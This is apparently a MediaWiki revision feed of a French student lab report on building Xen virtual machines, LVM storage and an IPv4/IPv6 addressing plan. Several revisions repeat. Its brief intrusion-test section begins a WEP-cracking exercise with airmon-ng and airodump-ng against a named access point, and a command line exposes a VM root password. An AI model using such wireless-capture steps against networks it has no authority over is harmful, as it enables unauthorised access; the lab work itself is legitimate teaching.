  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56285</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56285"/>
				<updated>2021-10-25T16:00:15Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
&lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56282</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56282"/>
				<updated>2021-10-25T15:59:34Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
